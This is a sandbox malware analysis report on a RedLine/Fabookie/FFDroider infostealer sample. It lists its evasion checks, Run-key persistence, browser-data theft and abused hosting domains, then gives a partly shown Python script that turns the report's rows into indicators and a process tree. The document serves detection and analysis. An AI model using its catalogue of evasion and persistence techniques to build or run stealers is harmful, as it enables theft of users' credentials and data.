Malware Analysis Report

2024-11-13 19:18

Sample ID 241109-y7c97s1jds
Target a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132
SHA256 a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132
Tags
fabookie ffdroider redline jameshook discovery evasion infostealer persistence spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132

Threat Level: Known bad

The file a3b251a139324a6df006eb9733c30199edf41dffe994ca0140296605613c2132 was found to be: Known bad.

Malicious Activity Summary

fabookie ffdroider redline jameshook discovery evasion infostealer persistence spyware stealer themida trojan upx

Redline family

Detect Fabookie payload

FFDroider

RedLine

Fabookie

RedLine payload

Fabookie family

Ffdroider family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Detected Nirsoft tools

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Checks computer location settings

Checks whether UAC is enabled

Drops Chrome extension

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

UPX packed file

Program crash

Unsigned PE

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

NTFS ADS

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Kills process with taskkill

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 20:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 20:25

Reported

2024-11-09 20:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng." C:\Users\Admin\AppData\Local\Temp\piz.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\secd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 468 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cld.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\file_clu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\secd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000f512686b6d97716c781d45a82d226ea381302566bab72bd9c30f871612abe6a0000000000e8000000002000020000000936f64b179328a24976fa0ab3d976228a97a13f063632d953545e7079f2707ea20000000404c84347f79aeafe9ffcaf1999aed374a70c2da32a110aec92177c88432d1fd400000005cb2fd77362aa8cac07e34232e2d1900d0a5f4207325a72913a9705173451146bc0ad801ba03fcc958cdfaaa3ef54d5fba9b30cbedd0b04c18486404c831eea0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1027108ce532db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [binary data omitted] C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437345791" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BED705B1-9ED8-11EF-B984-5A85C185DB3E} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary data omitted] C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary data omitted] C:\Users\Admin\AppData\Local\Temp\piz.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\asj.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary data omitted] C:\Users\Admin\AppData\Local\Temp\asj.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\www57F2.tmp\:favicon:$DATA C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\Shakmp.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\wwwE4D5.tmp\:favicon:$DATA C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\RarSFX2\ins.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\www1B23.tmp\:favicon:$DATA C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
File created C:\Users\Admin\AppData\Local\Temp\RarSFX1\jul.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
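
The signature tables in this analysis emit one row per registry access and one row per WriteProcessMemory call, which buries the two things an analyst wants first: the distinct indicators and the process lineage. The script below is an added example, not the sandbox's own tooling. It parses a constructed subset of rows copied from this report (the ACPI VBOX__, EnableLUA, Run-key and AuthRoot rows above, the iplogger.org / bitbucket.org / ip-api.com indicators, one NTFS ADS row, the SetThreadContext row, and parent/child pairs from the WriteProcessMemory table that follows) into de-duplicated typed IOCs, and rebuilds the process tree from the PID pairs, flagging the SetThreadContext call in which quv.exe (PID 468) targets a second quv.exe instance (PID 2892), the usual shape of RunPE-style hollowing. The IOC kind names and the "hollowing candidate" label are the example's own, not the report's. One caveat on the AuthRoot rows: thumbprint 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 is the SHA-1 of the DigiCert High Assurance EV Root CA, so that write is most likely Windows' automatic root update fetching a legitimate root on first TLS use rather than the sample installing its own CA; the script still extracts it so the analyst can confirm against the host's AuthRoot store.

```python
"""Parse this report's "Description Indicator Process Target" rows into typed IOCs and a process
tree. Added example, not the sandbox's tooling; ROWS is a constructed subset of behavioral1 rows."""
import re
from collections import defaultdict

TMP = r"C:\Users\Admin\AppData\Local\Temp"
DROPPER = rf"{TMP}\66dc47363eed7c1f7528e1859a32037020450756eb0ce8950df397a64058481c.exe"
ROWS = [
    rf"Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ {TMP}\RarSFX2\per.exe N/A",
    rf"Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA {TMP}\cld.exe N/A",
    r"Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng"
    rf' = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng." {TMP}\piz.exe N/A',
    rf"Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 {TMP}\asj.exe N/A",
    "N/A iplogger.org N/A N/A",
    "N/A iplogger.org N/A N/A",
    "N/A bitbucket.org N/A N/A",
    "N/A ip-api.com N/A N/A",
    rf"File created {TMP}\RarSFX2\ins.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A",
    rf"PID 2092 wrote to memory of 3056 N/A {DROPPER} {TMP}\file_clu.exe",
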